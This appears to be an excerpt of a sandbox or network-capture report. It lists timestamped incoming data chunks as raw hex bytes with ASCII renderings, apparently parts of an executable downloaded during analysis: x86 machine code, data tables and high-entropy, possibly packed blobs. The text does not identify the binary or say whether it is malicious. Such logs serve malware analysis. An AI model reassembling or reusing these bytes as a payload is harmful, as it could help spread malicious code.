2023-10-13 13:21:12 UTC	648	IN	Data Raw: 04 08 e9 35 fc ff ff 83 6c 24 04 08 e9 a0 fc ff ff b8 ba a9 41 00 e8 8a 2e 00 00 51 68 c8 00 00 00 e8 a1 2f ff ff 59 8b c8 89 4d f0 33 c0 3b c8 89 45 fc 74 05 e8 c6 fb ff ff 8b 4d f4 64 89 0d 00 00 00 00 c9 c3 e9 00 00 00 00 b9 60 06 42 00 e9 c9 57 ff ff 8b c1 33 c9 c7 40 04 24 b5 41 00 c7 40 08 60 b8 41 00 89 48 0c 89 48 10 89 88 a0 00 00 00 89 48 14 88 88 90 00 00 00 88 88 91 00 00 00 c7 80 b4 00 00 00 00 00 10 00 c7 80 b8 00 00 00 00 00 40 00 88 88 c0 00 00 00 c7 00 24 b9 41 00 c7 40 04 14 b9 41 00 c7 40 08 00 b9 41 00 89 88 a4 00 00 00 89 48 1c 89 48 18 89 48 34 89 48 30 c3 55 8b ec 56 8b 75 0c 6a 10 68 4c b9 41 00 56 e8 4a 29 00 00 83 c4 0c 85 c0 75 0a 8b 4d 10 8b 45 08 89 01 eb 59 6a 10 68 a8 b2 41 00 56 e8 2c 29 00 00 83 c4 0c 85 c0 74 e2 6a 10 68 Data Ascii: 5l$A.Qh/YM3;EtMd`BW3@$A@`AHHH@$A@A@AHHH4H0UVujhLAVJ)uMEYjhAV,)tjh
2023-10-13 13:21:12 UTC	664	IN	Data Raw: ff 54 8f 08 8b 7b 08 8d 0c 76 8b 34 8f eb a1 b8 00 00 00 00 eb 1c b8 01 00 00 00 eb 15 55 8d 6b 10 6a ff 53 e8 ce ed ff ff 83 c4 08 5d b8 01 00 00 00 5d 5f 5e 5b 8b e5 5d c3 55 8b 4c 24 08 8b 29 8b 41 1c 50 8b 41 18 50 e8 a9 ed ff ff 83 c4 08 5d c2 04 00 55 8b ec 6a ff 68 e0 b9 41 00 68 2c 4a 41 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 58 53 56 57 89 65 e8 ff 15 74 b0 41 00 33 d2 8a d4 89 15 d0 33 42 00 8b c8 81 e1 ff 00 00 00 89 0d cc 33 42 00 c1 e1 08 03 ca 89 0d c8 33 42 00 c1 e8 10 a3 c4 33 42 00 6a 01 e8 96 0e 00 00 59 85 c0 75 08 6a 1c e8 c3 00 00 00 59 e8 48 09 00 00 85 c0 75 08 6a 10 e8 b2 00 00 00 59 33 f6 89 75 fc e8 b7 2a 00 00 ff 15 78 b0 41 00 a3 3c 5a 42 00 e8 75 29 00 00 a3 40 33 42 00 e8 1e 27 00 00 e8 60 26 00 00 e8 bb 20 00 00 Data Ascii: T{v4UkjS]]_^[]UL$)APAP]UjhAh,JAdPd%XSVWetA33B3B3B3BjYujYHujY3u*xA<ZBu)@3B'`&
2023-10-13 13:21:12 UTC	680	IN	Data Raw: 41 00 85 c0 74 04 8b c6 eb 1d 8d 45 e4 50 56 68 f4 bd 41 00 56 53 ff 15 04 b0 41 00 85 c0 0f 84 ce 00 00 00 6a 02 58 a3 58 35 42 00 83 f8 02 75 24 8b 45 1c 3b c3 75 05 a1 3c 35 42 00 ff 75 14 ff 75 10 ff 75 0c ff 75 08 50 ff 15 04 b0 41 00 e9 9f 00 00 00 83 f8 01 0f 85 94 00 00 00 39 5d 18 75 08 a1 4c 35 42 00 89 45 18 53 53 ff 75 10 ff 75 0c 8b 45 20 f7 d8 1b c0 83 e0 08 40 50 ff 75 18 ff 15 a8 b0 41 00 89 45 e0 3b c3 74 63 89 5d fc 8d 3c 00 8b c7 83 c0 03 24 fc e8 70 b1 ff ff 89 65 e8 8b f4 89 75 dc 57 53 56 e8 40 f2 ff ff 83 c4 0c eb 0b 6a 01 58 c3 8b 65 e8 33 db 33 f6 83 4d fc ff 3b f3 74 29 ff 75 e0 56 ff 75 10 ff 75 0c 6a 01 ff 75 18 ff 15 a8 b0 41 00 3b c3 74 10 ff 75 14 50 56 ff 75 08 ff 15 00 b0 41 00 eb 02 33 c0 8d 65 cc 8b 4d f0 64 89 0d 00 00 Data Ascii: AtEPVhAVSAjXX5Bu$E;u<5BuuuuPA9]uL5BESSuuE @PuAE;tc]<$peuWSV@jXe33M;t)uVuujuA;tuPVuA3eMd
2023-10-13 13:21:12 UTC	696	IN	Data Raw: 00 00 00 00 00 00 00 00 00 ff ff ff ff 68 99 41 00 ff ff ff ff 70 99 41 00 ff ff ff ff 78 99 41 00 20 05 93 19 08 00 00 00 f0 d0 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 8c 99 41 00 00 00 00 00 94 99 41 00 01 00 00 00 9c 99 41 00 01 00 00 00 a4 99 41 00 01 00 00 00 ac 99 41 00 01 00 00 00 b4 99 41 00 00 00 00 00 bc 99 41 00 ff ff ff ff c4 99 41 00 20 05 93 19 01 00 00 00 50 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff d8 99 41 00 20 05 93 19 01 00 00 00 78 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ec 99 41 00 20 05 93 19 02 00 00 00 a0 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 9a 41 00 00 00 00 00 0a 9a Data Ascii: hApAxA AAAAAAAAA PAA xAA AA
2023-10-13 13:21:12 UTC	888	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2023-10-13 13:21:13 UTC	2024	IN	Data Raw: bd 00 4e 01 76 81 53 2d e6 6d b6 44 31 e4 16 72 18 fa ce 0d 3d 37 93 c6 d9 15 be 32 e1 f7 16 1b 2b a3 74 55 79 09 38 ae ac df f7 83 fe 6e 0f 23 91 5c dd a7 27 e7 ac 7b ad 6e ee 2d b4 69 03 c4 d0 98 55 83 5c 1f c7 2f 99 57 c2 c9 26 b6 8b 84 28 ab c4 3b d5 9e 65 d1 a4 28 37 02 fb 56 bb 61 90 7d 10 59 97 a4 b1 f7 dc e9 77 67 f5 07 50 f9 e7 6f 72 1a 21 2e d0 82 ed 52 2c 6a 23 ea 2f b9 09 e8 5a 8c 7a cb fb 47 73 d1 5c 00 9a a1 7e af d1 8f d7 81 d8 da 0f 6f a8 62 1e 79 d2 8f d2 d0 e5 70 4a 10 39 0a 65 e2 0d b7 4d 3c df 2a 77 02 3b ee da 64 0d fc 5a 90 31 b2 af d2 af 39 99 2b 64 bb 3f 19 59 4f 18 4c db da c7 06 21 e2 32 1a 0d c8 89 cc 5e be 4c 9f 22 a3 12 94 ec c8 80 f6 3f 9a 2f fe f5 9a 4a 24 46 22 d1 41 e1 82 a0 82 73 75 94 cc c2 c7 39 37 fa bb 99 e2 c7 ee bb Data Ascii: NvS-mD1r=72+tUy8n#\'{n-iU\/W&(;e(7Va}YwgPor!.R,j#/ZzGs\~obypJ9eM<*w;dZ19+d?YOL!2^L"?/J$F"Asu97
2023-10-13 13:21:13 UTC	2056	IN	Data Raw: a5 e1 f1 10 28 8e 09 15 5e 07 0b 7c 05 b0 b0 d4 24 c0 e4 2a 5e 9c f0 b4 3e 02 f8 4d 2d cf c2 e2 95 7a 7d 57 aa 53 bf 67 53 6d b6 13 36 e9 91 2c 92 50 7e 72 56 2d 7b 0f 02 03 74 e5 c9 9f 50 e2 af 25 d7 11 e9 da 8a 1a 30 78 2e 4b 67 cf 68 af c3 72 fa 5c e9 1b b4 72 dc 1d 20 9e e6 1e 1e 7c 22 9c 9e e9 a5 fc 1c 39 77 d2 0e 2b 48 f7 89 94 29 00 ae 35 3d c8 69 3c 4d 0d 7c 33 36 d6 50 d7 f8 50 2a 77 71 2a 6a a8 03 d3 0b ef f1 bb d3 54 c1 a3 83 41 4f 0a e6 50 11 90 95 4c ad 9a b8 ca c7 43 7a 02 55 a6 1b 81 22 7c d4 5c d2 9f df 0c c2 5e fc 49 32 bb d3 ca 93 82 ab 7f 2c d2 0b 65 e3 6f 0e be 8e c5 67 a9 29 39 ce 3e 9d cc fa e0 61 65 2b 52 33 f2 ac 2b 14 55 3f 47 77 58 c3 0c 1e 1b 87 1e 57 d9 cf e6 d0 0b 1e 2e 92 e2 33 b2 2a 6f 73 de 9f 59 44 e5 c8 e8 86 92 79 10 82 Data Ascii: (^\|$^>M-z}WSgSm6,P~rV-{tP%0x.Kghr\r \|"9w+H)5=i<M\|36PPwqjTAOPLCzU"\|\^I2,eog)9>ae+R3+U?GwXW.3osYDy
2023-10-13 13:21:13 UTC	2072	IN	Data Raw: e3 b8 fe 05 c2 df e6 3b ab 4a 99 67 ff ec 4f 16 2b e8 5b 72 36 94 b0 8c 6d 25 63 94 33 d2 67 66 5a 13 44 a2 a8 3e ba 0a 97 55 9c fc 47 29 09 0b f6 9a 4c 84 7a c4 04 a9 76 86 13 89 7b 48 fe 26 6c 90 67 11 5b 92 3c 3e 71 3f d5 d5 27 d3 74 00 cf 3e ab 81 f9 b7 b6 53 2b 8c 45 ed 29 cd 34 2b c1 49 b6 27 71 83 65 52 e3 4b 76 47 96 12 dc c3 bd c9 3b 2d 0a dd 20 9d 59 16 d4 5c cb 25 92 cd da a2 53 3e 0d 81 87 4c b4 31 2b a7 4c 3c da e1 a8 40 10 d5 59 40 10 43 ce 17 ff cb 28 a1 03 3b 41 41 44 9a 44 44 be 63 16 b1 34 8b a6 9a a4 8a 89 dd 89 33 d4 d7 54 94 18 a7 cf c6 ba b5 6c 64 03 ec af f8 62 42 bc 34 6e bd 38 64 b6 67 36 e3 8b c5 ee d3 c0 5a 3d 66 56 ae dd 6a 51 89 26 ac 3a 25 f9 70 10 ed e6 6b be 69 b4 0d be a6 d1 22 d4 fe ca 11 c0 e6 cf 29 c2 f4 16 c0 dd 15 f7 Data Ascii: ;JgO+[r6m%c3gfZD>UG)Lzv{H&lg[<>q?'t>S+E)4+I'qeRKvG;- Y\%S>L1+L<@Y@C(;AADDDc43TldbB4n8dg6Z=fVjQ&:%pki")
2023-10-13 13:21:13 UTC	2104	IN	Data Raw: 18 62 5e b6 5d 73 4f a6 cd 53 c8 2a d6 48 3e a5 b3 48 b9 29 7c f5 0b 4f 70 ba cb 40 c1 3d 94 21 de d3 82 1c d1 25 45 d4 e4 77 91 ef 28 12 a7 c5 1c 44 54 7f d8 35 b8 dd 45 32 2f 5e 8c bc 8e 38 27 19 26 70 ea 79 ea da 44 20 13 34 d0 b0 28 88 22 0c 58 87 36 62 b6 02 3f da f5 ca 59 87 b4 40 14 01 5a ae 27 2b c3 dc 08 a6 63 ce da 87 03 d4 99 ba 73 86 dc 18 9f 87 3e 10 0c 74 59 98 cd a4 71 19 fb 11 d2 bf 71 af 99 53 e7 be 2c 6e 18 91 60 35 bb ac 59 0e 9c 26 aa 27 3a cb ef 78 f0 3b 5e d4 80 bf f5 c9 9a 73 3d e4 2a fe 42 5f 82 bf 39 3d 84 23 57 e8 2b 49 ce 54 12 a7 89 ef 29 40 fb bd 5e ef 10 1e ac dd 18 8d 6d 2f cb 40 c5 63 b0 39 18 78 4d bc 44 5f 39 51 c8 88 ea 83 a0 4a 3d c0 8d b7 b7 d8 f3 8f d3 6e 2c 6e 3e 27 f6 20 4f cb c0 fd 74 ff 00 65 f8 07 60 55 ed 95 ea Data Ascii: b^]sOSH>H)\|Op@=!%Ew(DT5E2/^8'&pyD 4("X6b?Y@Z'+cs>tYqqS,n`5Y&':x;^s=B_9=#W+IT)@^m/@c9xMD_9QJ=n,n>' Ote`U
2023-10-13 13:21:13 UTC	2120	IN	Data Raw: ae ee 73 08 ad 9d e2 47 ec 4f a7 d3 58 87 a5 aa f8 73 81 67 01 61 39 16 92 9b 72 2a b8 ed ea a1 87 ed 0b 87 f3 20 93 80 87 dd 9b ad 6e 2a 52 d6 12 8a ff 98 16 53 b5 3a 11 b9 ed 4b 37 80 60 a5 93 ee eb bf e0 bb e5 68 2d 9a 0f 79 5d dd 7e 28 48 8c bd 8a ca 85 92 71 25 c2 24 ad 2d 6f 26 a7 2d 96 d5 4b 85 b3 a9 1e 5b 41 6a a0 cb e4 01 97 21 4a 10 8c 19 9b 53 8c ec 7f 4f 08 c2 d8 0a c7 1a 11 f9 a9 fe 3e 00 da e1 8f f8 18 28 e2 57 d2 dc d0 72 8a c0 b9 c8 e7 e4 af d4 9e 41 bc fa 07 1d ba 29 95 22 74 c0 40 33 ba 53 2c 72 14 ee ca 9f 70 ee 82 87 31 48 5e c1 fa 77 0f 45 12 4d 75 b1 b2 1d 0e 7d 38 ca 40 02 e8 3e 43 1b 68 dd eb f1 72 6a b3 e0 96 09 61 32 aa 2f ba 19 2f 04 fb 6e 59 bc 13 0e e0 35 42 e4 21 bd e3 a5 37 88 dc ed 13 e3 3b 50 43 17 e4 e8 3a 6f 49 9a a0 97 Data Ascii: sGOXsga9r* n*RS:K7`h-y]~(Hq%$-o&-K[Aj!JSO>(WrA)"t@3S,rp1H^wEMu}8@>Chrja2//nY5B!7;PC:oI
2023-10-13 13:21:13 UTC	2136	IN	Data Raw: 16 a5 1f 98 ee 45 0f e5 c8 65 86 82 9f 1e 7c 88 64 51 cb 14 0c 88 e7 26 ac f1 8d 8f 02 81 a1 f4 4c ec ee 4a 30 6a 56 0a 16 c5 fe 77 db d3 b5 3e 31 a6 fc a5 7a 59 4f a6 a2 66 c6 41 d9 17 66 19 88 e1 9b 2e e2 44 58 fe 9c ab c8 5c 27 94 c6 6a 9b 9b e9 d9 ac 65 8d 2e 12 59 06 03 fb fb 6d 98 cf 85 20 72 ec ee d7 c5 35 cd 95 3c 2b 4d 54 ea e1 14 f3 08 5f 72 26 e0 1d 7f 0a cc 47 d5 31 08 af 44 d5 a8 2b 11 06 f6 19 d7 f4 23 a6 2e d2 94 ee 39 7f 23 e2 e7 74 c3 79 65 ab cb 09 da 90 65 76 aa a6 b2 41 74 b6 6c cb 06 02 a9 54 5b 7f 8f bf 57 6f f8 53 db d8 71 68 10 31 70 5e 1f 96 76 80 a3 09 5c 62 89 bc e3 e9 10 18 42 e3 82 2b 51 c4 d6 10 1b 0e 1e 06 71 4f d9 58 4f 81 61 8b fd 5b 2e 3b 21 4e 2e 06 01 af d9 cb 36 ca 65 a0 21 80 90 44 25 51 a8 a2 bd c7 39 29 a2 bc 80 7c Data Ascii: Ee\|dQ&LJ0jVw>1zYOfAf.DX\'je.Ym r5<+MT_r&G1D+#.9#tyeevAtlT[WoSqh1p^v\bB+QqOXOa[.;!N.6e!D%Q9)\|
2023-10-13 13:21:13 UTC	2152	IN	Data Raw: 17 af 33 8f dd 57 29 be 23 d7 41 25 6a 6b 39 06 be 5d 93 a3 d9 c8 d7 42 3e 4a 70 8b 0b 28 4f 75 e4 b0 04 13 68 84 24 16 b9 0b ef aa 9d a7 63 0f 11 31 63 f4 7b b5 2f 08 ee e2 cc f8 52 e3 39 7f 92 aa b6 1e f7 18 d4 f2 1f e6 3d 71 e3 ff ee 45 9b 66 64 62 09 aa 91 3b e9 62 48 f6 4c ed 3e 74 1c 6b 20 55 b1 92 83 c1 d7 71 40 77 2a 0d 45 f1 45 aa 02 86 27 a2 ec d3 fb 5c 90 03 18 c9 6c 25 cd be 8c 7b 74 34 63 96 7c c5 24 3a 0c d8 4b ec 90 a0 15 67 3f b8 77 f0 3e 2f 78 1e 20 08 3c dd 2c 12 6c 98 2d f8 7e ca 26 c9 cc 80 21 77 69 30 23 fc ba 49 71 63 9b 67 d9 14 79 30 8e 67 bf ec 6a 7a 78 de 15 d0 91 61 9a d4 dc 04 b5 0f 2c ad 05 c7 34 8d 46 13 46 6c f1 e1 e3 b2 90 12 e2 ce ba c4 2b cd 29 a1 5b 92 81 f7 57 25 ff 99 f1 55 59 20 25 eb d7 28 7c 45 57 3f df e7 6f 5e da Data Ascii: 3W)#A%jk9]B>Jp(Ouh$c1c{/R9=qEfdb;bHL>tk Uq@w*EE'\l%{t4c\|$:Kg?w>/x <,l-~&!wi0#Iqcgy0gjzxa,4FFl+)[W%UY %(\|EW?o^
2023-10-13 13:21:13 UTC	2168	IN	Data Raw: 62 dc 27 a7 e6 2d 80 b4 75 8a 80 88 dd a8 56 9b 7e 1f fc 12 19 b9 a2 70 32 33 00 79 fd 94 9c 4c 54 68 97 76 e8 d1 f4 d5 41 0a fb ba 7e ea 7b fb 49 cc ee a4 92 b1 dc c4 f9 da 0c 2f 9c 5f 91 e7 c6 09 7d 0b cb 3e b9 72 e2 16 14 e8 9d 46 8c a1 01 60 6a 90 0f 9c 23 26 af f9 02 56 12 63 41 1a c2 f9 44 e4 6c f5 76 0b f3 c3 f0 ba 7a 93 52 a0 62 6f 4f a3 25 d6 4b 15 34 e6 99 20 0d ba de 8b 43 e4 42 bd f4 af c9 46 fe ab 95 36 07 92 4b c9 13 1b 84 65 39 00 89 77 88 31 68 6f 5c 0d 1f 39 5b 91 b1 84 95 15 95 a1 f3 54 06 a7 73 47 e2 19 3e 43 82 11 54 25 e1 95 ea 14 a6 cb 99 e3 1e 64 25 83 d1 bd 1c 31 24 a4 76 21 0a 0f 34 00 26 d9 14 2d f7 d7 86 fb a3 73 05 b5 6d c4 a7 9d 73 1b 05 e6 ff 47 62 91 5b ed 33 a0 ce c3 85 86 62 3d 44 bb cb ad 9a 7d de a1 77 bd 37 96 f2 ed 2b Data Ascii: b'-uV~p23yLThvA~{I/_}>rF`j#&VcADlvzRboO%K4 CBF6Ke9w1ho\9[TsG>CT%d%1$v!4&-smsGb[3b=D}w7+
2023-10-13 13:21:13 UTC	2184	IN	Data Raw: ec 1d 37 64 cb 09 e4 fa 61 de b0 af b4 c3 24 8b 15 8d 7f 49 90 38 16 cf 74 91 3e 64 3d b9 50 9b 52 0f 70 dd 02 7b f1 88 af 81 a6 e8 7c 26 07 a2 db 36 93 58 2a b4 70 ac ee c0 b4 83 14 2a 3b a5 ae 2b e8 58 4f cf f9 fd d4 f0 fe 53 2e c1 7c ff 42 a2 d0 cb 0e 77 fb 7e 05 80 63 b1 c0 14 67 e2 3d 37 07 a5 6e b8 63 a3 51 2a ed 8c b8 de a0 7c 06 63 19 83 8d 87 ac 16 9b 29 bc b3 70 0b 73 a0 4f 71 bc 21 4a 23 6a 72 fe b4 b6 5b 71 c9 c3 01 ca 11 37 8c f4 7e 22 27 d8 78 6c dd 54 74 cf 07 49 37 8b b7 cd 9c ed de 57 33 7b c8 e0 c1 35 5a 9f bd 4d 20 b2 f8 f7 bb 3c ea e5 56 e2 80 92 f7 88 84 8b af 85 70 4b bd 2c 7b 75 e0 75 db ab e8 c1 b8 7a 4e 99 d5 ed af 39 73 88 ce af 4a ef 9a 82 b3 d7 8c f7 81 b1 81 28 59 a2 a6 93 98 a8 59 da 77 2c 43 fb a3 b9 05 34 29 30 8b 56 52 21 Data Ascii: 7da$I8t>d=PRp{\|&6Xp;+XOS.\|Bw~cg=7ncQ*\|c)psOq!J#jr[q7~"'xlTtI7W3{5ZM <VpK,{uuzN9sJ(YYw,C4)0VR!
2023-10-13 13:21:13 UTC	4748	IN	Data Raw: e2 64 48 ff cc a9 08 88 c9 a0 22 0e 25 4c 0b af d7 30 25 a9 c1 89 85 0a 8c 4e ca 7a 64 57 30 b0 23 14 71 01 e7 16 ba 60 a0 12 f3 ae f8 44 10 54 88 8f e2 99 94 aa 0c 80 9b 48 e0 00 0f 77 97 3f 88 fc 11 ee 68 4f b0 36 11 da 3e dc 68 ae 53 45 c3 89 7b f8 01 77 bf b8 ae 7c 5f d5 a7 20 20 80 fb 66 ca d0 05 11 76 07 bb 81 ce 11 de 7b fc 9f 9f eb 91 ff ee 0b 69 d7 90 90 17 29 37 43 55 3f f6 2b 49 7b 1a 8c ac ea 74 6d 0f 45 64 02 09 ce 74 fe 41 77 a3 0e 6f 2a 35 b4 ac 4c 26 d5 36 9a 69 89 3f 5b c8 9e b6 23 b3 1b 94 0e 3f 42 58 a4 74 cf a0 b7 28 f4 6f 83 f8 46 15 95 fc dc 53 2f 43 ea 20 dd 29 50 9e f6 4b aa 80 83 78 d2 b9 55 3f 92 04 b0 48 34 33 58 ea 5b 0a 33 15 6c 82 5c d5 fa e3 3b 52 c1 2c 93 ec 00 1b 21 5a d6 c1 55 3a c7 b0 49 d2 eb 60 de 6d d4 da 07 0f 16 89 Data Ascii: dH"%L0%NzdW0#q`DTHw?hO6>hSE{w\|_ fv{i)7CU?+I{tmEdtAwo*5L&6i?[#?BXt(oFS/C )PKxU?H43X[3l\;R,!ZU:I`m
2023-10-13 13:21:13 UTC	4764	IN	Data Raw: 84 ac f7 30 8f f3 d7 af 99 11 34 8a f5 62 ff 8b 19 a8 dd b0 05 88 f7 8c 17 cc 9e 68 e9 16 65 96 0e b0 37 30 f5 d8 0f 77 1a 02 a4 07 09 13 bc f8 7e c1 d6 2b 7e ce 4f 4d 38 a9 99 9d e1 ca ce 15 86 1e 85 0c 55 c3 11 d1 9b c1 79 69 a3 e4 57 a7 57 e1 81 0a 52 75 51 36 7d 02 4e c1 2d 4b 50 04 c4 87 df b0 bb 58 90 d8 ba 05 5b 76 98 ba 45 b2 38 bc 30 6a 88 2e 69 a7 36 c9 3f 56 45 a4 b5 b5 60 2e 68 bc 8c 9f ce a8 de c7 12 b6 96 36 c0 b5 e8 7c db 4c e8 7d a4 36 e2 5d 87 45 30 7a 6d 7c 3d 4f a3 90 b0 71 02 d4 5b 62 ab 05 e9 63 5c a9 ff 5e 0d 99 b9 dd b2 76 ba f2 ae 57 f3 bc a9 4d c0 bd 4c 7d b4 8a db e1 5f bc 47 36 07 30 01 72 19 c3 b3 f4 77 6b 6e 12 a0 85 8a d0 54 e5 29 d7 3f e8 8e 54 ae 4b 6d a6 b0 ac 32 cb 53 d9 78 79 af df 43 15 8a e2 4d 72 03 4f c2 d2 ce 6a 9d Data Ascii: 04bhe70w~+~OM8UyiWWRuQ6}N-KPX[vE80j.i6?VE`.h6\|L}6]E0zm\|=Oq[bc\^vWML}_G60rwknT)?TKm2SxyCMrOj
2023-10-13 13:21:13 UTC	4780	IN	Data Raw: 6d bd b5 98 80 e0 f7 2d cf 1b 99 96 0d b5 60 0b e7 0d fb b5 da 5e 64 9d e8 41 5f 6e ee 81 89 c7 6d 1b 5c 09 b0 46 76 ea 25 36 ac 18 a8 10 04 ac 77 18 b5 9c 19 f9 be b5 30 7b 4f 0f 5a 1a c1 30 45 4b c7 b4 28 45 f2 8c 52 ef dc 0d 2e 3a ae b8 c5 79 c5 c1 b6 22 3b 40 e8 74 68 28 60 9b 67 53 bd d7 18 fe ab b7 10 35 0d 3a 2b 6a 9d 0d 78 e3 d7 a0 7e b2 5d 4c 7a a1 7c ee f5 74 7a 5d 0a 5d cb 33 2b 92 64 c1 23 d3 04 d2 25 7a a2 f8 5a 76 0e d3 f9 a9 b7 0b ec 7a 78 52 c1 2c 40 c0 fe 35 d1 5f 8e 54 ff 20 e1 98 b9 d6 c7 4f 63 a3 c7 40 6a f0 ab 69 28 10 23 a1 8d 9a 1b fc bf f4 0e dd 78 07 2b 7b f9 30 ba f8 25 dd 38 73 ba ac 89 62 dc 56 d2 66 07 ea fc 8c 24 92 3b 65 7a ea 52 d3 ff 1a e9 58 82 74 c2 77 39 a4 9e 86 ab 66 61 d9 93 36 9f c3 a7 57 16 0a d7 d6 a8 33 53 10 19 Data Ascii: m-`^dA_nm\Fv%6w0{OZ0EK(ER.:y";@th(`gS5:+jx~]Lz\|tz]]3+d#%zZvzxR,@5_T Oc@ji(#x+{0%8sbVf$;ezRXtw9fa6W3S
2023-10-13 13:21:13 UTC	4796	IN	Data Raw: 74 b7 a4 e8 61 38 8f 36 38 ee a6 6d c8 2c 6c 9f 23 7b 94 cc 9e 75 c1 7e fd 6c 2c 62 cd a8 f6 9e 2c 3e f8 fd 6b fb be 33 d1 82 88 e9 9c 53 ac 92 2a ef 77 20 9b 71 fd d8 d3 f0 e4 4c 26 ea 44 b8 22 58 38 59 43 71 34 4b ad 83 4a c1 09 aa d9 7c b8 51 08 26 29 ca 6b 29 39 e1 f2 ef 77 32 3f 53 25 98 86 77 a4 72 24 61 c4 69 d2 78 60 92 93 00 82 63 b1 98 01 76 b6 10 2b 7a 75 0f 27 ae 29 5d b2 48 76 62 a2 fb 93 9a 43 46 e7 ba 24 34 e6 4b 01 bc 9e b6 b9 27 31 68 12 75 d4 eb cf 22 0c 1a f2 26 45 50 0d 40 2c 33 4b 7f eb 80 03 a9 16 81 4d 31 6b b9 6e c3 96 30 51 c5 be 87 4a f5 e1 f5 f5 05 30 4c 41 42 13 10 29 a0 67 fc 27 ca 53 0b bf fe 89 2b aa 21 37 15 18 ed 04 b0 c9 22 f8 15 0b c0 1d 3e 45 b2 b9 11 02 0e a1 e0 99 f3 e4 a6 1b 31 b7 1a ae 61 7e a4 63 18 2a 78 89 8d 71 Data Ascii: ta868m,l#{u~l,b,>k3Sw qL&D"X8YCq4KJ\|Q&)k)9w2?S%wr$aix`cv+zu')]HvbCF$4K'1hu"&EP@,3KM1kn0QJ0LAB)g'S+!7">E1a~cxq
2023-10-13 13:21:13 UTC	4812	IN	Data Raw: 09 e1 97 0a 8b 1b 09 3a 3b 27 07 82 b3 8d 5c ef 7a 18 ee 37 cc f5 c8 7e 77 f5 3f 24 31 0e 35 09 3c 14 09 a8 d0 97 bc 7f 51 06 af 14 31 ad bc 97 1c 4f 80 63 7d ea 1a 42 ac 6f 98 a2 49 1c 71 fb c6 f1 6d 5f e3 7d 78 31 a4 35 5a 61 d9 ba 64 b9 47 0c 17 f6 70 e4 0b 78 5a fc 18 f7 40 58 ba 82 96 15 a4 8c ee 87 93 c6 69 0b db 59 b6 d3 ef 6a ff e1 02 37 0a 9d da 7a 85 85 94 1b d8 84 a7 f8 04 79 3d 61 8e 76 80 9b bd 6a c7 fc a2 12 60 97 f5 6d fc 99 e9 15 99 12 ee 01 c8 3b a3 99 bd 3f a2 ad dd d2 c4 92 96 c0 8a b6 05 2c 7d c7 dd 1b 72 44 e1 30 19 81 60 ae 9f 4b fb e2 07 30 71 5f c9 b9 14 b3 74 6b 6a ef de 17 74 2a 77 11 7c fa 38 4b 74 eb ff fe 52 4b 35 86 bf 83 3b fe 01 8a 13 28 5d 69 0d 83 a5 e2 aa cc b3 91 fe d3 fb a1 8a 1d 00 b2 b6 ff 5b 45 28 1f c3 f8 8e 25 52 Data Ascii: :;'\z7~w?$15<Q1Oc}BoIqm_}x15ZadGpxZ@XiYj7zy=avj`m;?,}rD0`K0q_tkjt*w\|8KtRK5;(]i[E(%R
2023-10-13 13:21:13 UTC	4828	IN	Data Raw: cb 0a 8a 94 ef 8e 6e 68 92 d8 2b 51 0e 77 0c c6 82 55 9f d8 8f 34 c8 b2 a5 ac 95 56 1a b8 cc 60 3e 37 d0 c6 83 9d ce ef b2 eb 6a 3f 53 28 96 cc 79 7c 06 75 6c e8 16 af 98 bd bc b9 5a 65 c2 76 b0 9e b2 0b 33 48 f2 2a 2b c2 de 7e 6e ab 23 85 c0 8a 29 8f 42 ae 38 4f e4 83 de fa 2e 96 a4 70 fe 42 64 6b e2 23 81 bd 9d ee f8 a4 54 f6 86 cd 36 43 6a 9d b8 cf 8f 33 21 56 af 39 cd be 8c 0b c7 dc 7f e6 19 a5 e0 7e 1a 1d d6 5d 7b 48 d3 f6 fc f6 3d da 6f da 67 06 a9 6c b2 11 43 28 6d ad c7 f2 5d 6e 25 f4 a6 a4 1d fa 92 bf 49 79 14 45 01 c9 c1 13 00 b1 46 57 22 d5 25 89 bb 57 e4 a0 32 47 1a f3 01 f4 5d f6 f2 c9 b9 5c 6f b4 6d 01 7e 36 c5 c0 9e a7 b5 d1 59 e2 cb 28 a3 90 d1 57 a1 c7 df b8 10 fa b6 89 32 dc 01 95 86 05 bd d5 2e 77 e3 f3 a8 8c 30 f6 bd a2 f4 6c 3b 60 fe Data Ascii: nh+QwU4V`>7j?S(y\|ulZev3H*+~n#)B8O.pBdk#T6Cj3!V9~]{H=oglC(m]n%IyEFW"%W2G]\om~6Y(W2.w0l;`
